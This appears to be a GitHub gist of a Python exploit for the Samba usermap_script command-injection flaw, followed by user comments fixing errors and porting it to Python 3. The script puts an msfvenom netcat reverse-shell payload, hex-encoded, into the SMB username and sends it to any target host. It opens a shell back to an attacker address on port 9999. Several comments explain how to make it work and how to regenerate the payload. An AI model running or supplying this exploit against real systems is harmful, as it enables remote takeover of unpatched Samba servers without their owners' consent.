Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
#!/usr/bin/python
from smb.SMBConnection import SMBConnection
import random, string
from smb import smb_structs
smb_structs.SUPPORT_SMB2 = False
import sys
# Just a python version of a very simple Samba exploit.
# It doesn't have to be pretty because the shellcode is executed
# in the username field.
# Based off this Metasploit module - https://www.exploit-db.com/exploits/16320/
# Configured SMB connection options with info from here:
# https://pythonhosted.org/pysmb/api/smb_SMBConnection.html
# Use the commandline argument as the target:
if len(sys.argv) < 2:
print "\nUsage: " + sys.argv[0] + " <HOST>\n"
sys.exit()
# Shellcode:
# msfvenom -p cmd/unix/reverse_netcat LHOST=10.0.0.35 LPORT=9999 -f python
buf = ""
buf += "\x6d\x6b\x66\x69\x66\x6f\x20\x2f\x74\x6d\x70\x2f\x6b"
buf += "\x62\x67\x61\x66\x3b\x20\x6e\x63\x20\x31\x30\x2e\x30"
buf += "\x2e\x30\x2e\x33\x35\x20\x39\x39\x39\x39\x20\x30\x3c"
buf += "\x2f\x74\x6d\x70\x2f\x6b\x62\x67\x61\x66\x20\x7c\x20"
buf += "\x2f\x62\x69\x6e\x2f\x73\x68\x20\x3e\x2f\x74\x6d\x70"
buf += "\x2f\x6b\x62\x67\x61\x66\x20\x32\x3e\x26\x31\x3b\x20"
buf += "\x72\x6d\x20\x2f\x74\x6d\x70\x2f\x6b\x62\x67\x61\x66"
buf += "\x20"
username = "/=`nohup " + buf + "`"
password = ""
conn = SMBConnection(username, password, "SOMEBODYHACKINGYOU" , "METASPLOITABLE", use_ntlm_v2 = False)
assert conn.connect(sys.argv[1], 445)
@ar0dd

This comment has been minimized.

Copy link

@ar0dd ar0dd commented Mar 3, 2019

Works like a charm. Thanks.

@rehamun

This comment has been minimized.

Copy link

@rehamun rehamun commented Sep 4, 2019

could u please clarify how the code ganna recognize the RHOST IP or the URL?

@jeffinm

This comment has been minimized.

Copy link

@jeffinm jeffinm commented Feb 26, 2020

Hi
I am getting this error, while running this code. Any idea why?

python samba-usermap-exploit.py

Traceback (most recent call last):
File "samba-usermap-exploit.py", line 4, in
from smb.SMBConnection import SMBConnection
ImportError: No module named smb.SMBConnection

@Anass-bekar

This comment has been minimized.

Copy link

@Anass-bekar Anass-bekar commented Mar 17, 2020

Download mysmb.py

@toddjones1984

This comment has been minimized.

Copy link

@toddjones1984 toddjones1984 commented Mar 20, 2020

I downloaded impacket and mysmb,py but I'm still getting errors any help would be appreciated.

Traceback (most recent call last):
File "3.0.20.py", line 3, in
from smb.SMBConnection import SMBConnection
File "/opt/smb/impacket/impacket/smb.py", line 49, in
from pyasn1.type.univ import noValue
ImportError: No module named pyasn1.type.univ
acket and mysmb.py and I'm still having issues.

@edenbomb

This comment has been minimized.

Copy link

@edenbomb edenbomb commented May 27, 2020

According to : http://http.kali.org/kali/pool/main/p/pysmb/
when we try to install smb for python2 it will be error due to file not found.
So I would like to suggest for editing
Old :
print "\nUsage: " + sys.argv[0] + " \n"
New :
print ("\nUsage: " + sys.argv[0] + " \n")

and using python3 instead.

Remark :
Command install ==> sudo sudo apt-get install -y python3-smb

@CybertSys

This comment has been minimized.

Copy link

@CybertSys CybertSys commented Jul 6, 2020

There's an encoding issue. I know what needs to happen but I'm unsure of the syntax.

username = "/=nohup " + buf + ""
TypeError: can only concatenate str (not "bytes") to str

@MidnightSeer

This comment has been minimized.

Copy link

@MidnightSeer MidnightSeer commented Jul 14, 2020

A tip, stick with python2, pip install pysmb still works...this exploit is the simplest they come.

@Anonimo501

This comment has been minimized.

Copy link

@Anonimo501 Anonimo501 commented May 30, 2021

hi.

despues de varios errores instale pip install pysmb y luego corregi el error de print " colocando el paréntesis ("") luego de hacer todo esto pude ejecutar el exploit pero luego salio un nuevo problema que es el siguiente:

python samba-usermap-exploit.py 192.168.1.70
Traceback (most recent call last):
File "/home/botache/samba-usermap-exploit.py", line 42, in
assert conn.connect(sys.argv[1], 445)
File "/usr/local/lib/python3.9/dist-packages/smb/SMBConnection.py", line 127, in connect
self._pollForNetBIOSPacket(timeout)
File "/usr/local/lib/python3.9/dist-packages/smb/SMBConnection.py", line 600, in _pollForNetBIOSPacket
raise SMBTimeout
smb.base.SMBTimeout

si alguien sabe la solucion a esto le agradezco.
un saludo y gracias.

ok regresando me doy cuenta que hay que crear el payload uno mismo con el comando: msfvenom -p cmd/unix/reverse_netcat LHOST=ipatacante LPORT=4444 -f python

pero luego de generarlo e intentar de nuevo enviando el ataque me sale lo siguiente:
Traceback (most recent call last):
File "/home/botache/samba-usermap-exploit.py", line 38, in
username = "/=nohup " + buf + ""
TypeError: can only concatenate str (not "bytes") to str

aun no resuelvo o no encuentro la solucion para ello, si alguien puede ayudar muchas gracias.

@Mohammed-Aljohani

This comment has been minimized.

Copy link

@Mohammed-Aljohani Mohammed-Aljohani commented Jul 4, 2021

to run this script successfully, follow the below steps:
1- sudo pip install pysmb
2- Add parentheses in print function because we will use python3, so will be like this: print ("\nUsage: " + sys.argv[0] + " \n")
3- since can't concatenate str (not "bytes") to str, we will decode our byte in line 38 then concatenate , so will be like this: username = "/=nohup " + buf.decode + ""

@cybertuxh4xor

This comment has been minimized.

Copy link

@cybertuxh4xor cybertuxh4xor commented Jul 29, 2021

help with this issue please.

└─$ python3 ./samba-usermap-exploit.py 10.10.10.3 1 ⨯
Traceback (most recent call last):
File "/home/kali/Downloads/19aaa00e0088738fc429cff2669b9851-6e1ae37e0061be103fd733b16266d26379a7f4ba/./samba-usermap-exploit.py", line 42, in
assert conn.connect(sys.argv[1], 445)
AssertionError

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment